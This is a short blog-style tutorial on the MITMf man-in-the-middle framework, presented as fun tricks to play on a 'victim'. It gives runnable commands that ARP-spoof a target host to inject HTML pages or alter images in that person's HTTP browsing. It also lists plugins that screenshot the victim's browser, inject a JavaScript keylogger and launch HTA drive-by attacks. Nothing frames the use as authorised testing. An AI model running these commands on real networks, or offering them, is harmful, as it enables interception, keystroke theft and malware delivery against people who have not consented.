Man-In-The-Middle Attack Framework: MITMf
MITMf
is a Framework for Man-In-The-Middle attacks. MITMf
aims to provide a one-stop-shop for Man-In-The-Middle and network
attacks while updating and improving existing attacks and techniques.Originally built to address the significant shortcomings of other tools (e.g
Ettercap
, Mallory
),
it's been almost completely re-written from scratch to provide a
modular and easily extendible framework that anyone can use to implement
their own MITM attack.MITMf
is available with Kali Linux. It can also be installed on any flavour of linux. To install MITMf kindly follow the process available at https://github.com/byt3bl33d3r/MITMf/wiki/Installation MITMf
is a simple to use command line attack tool. This
article presents some example which can be a real fun ;). Use it at your
own risk.Inject html page in victims browser
Create a index.html in your root folder and ...root@debian:~# cd /usr/share/mitmf/
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html
The above example will injects this index.html in the
victims(192.168.1.9 in this example) browser whenever he is viewing some
http(not https) website. -i
is for the interface (wlan0 in this example)--spoof
Loads plugin 'Spoof'--arp
Redirect traffic using ARP spoofing--gateway GATEWAY
Specify the gateway IP on your network.--targets TARGETS
Specify host/s to poison [if ommited will default to subnet]--inject
Load plugin 'Inject' to inject index.html
Note: arp spoof attack intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic thats going from victim to gateway now goes through the attackers system.
Make images look upside-down
This is real fun. Whatever http websites the victim is viewing, all images appearing on the pages will be flipped to 180 degrees.root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet
Replace images (Image Randomiser)
Image randomiser MITMf plugin replaces images in the victims browsers with a random one from a specified directory (/root/Pictures/
in this example).root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/
Other Plugins
There are many other plugins available withMITMf
you can play with.- To take a screenshot of victims browser
ScreenShotter:
Uses HTML5 Canvas to render an accurate screenshot of a clients browser
--screen Load plugin 'ScreenShotter'
--interval SECONDS Interval at which screenshots will be taken (default 10 seconds)
- Injects a javascript keylogger into victims webpages
--jskeylogger Load plugin 'JSKeylogger'
- Performs HTA drive-by attacks on victim
--hta Load plugin 'HTA Drive-By'
--text TEXT Text to display on notification bar
--hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]
http://www.googlinux.com/man-in-the-middle-attack-framework-mitmf/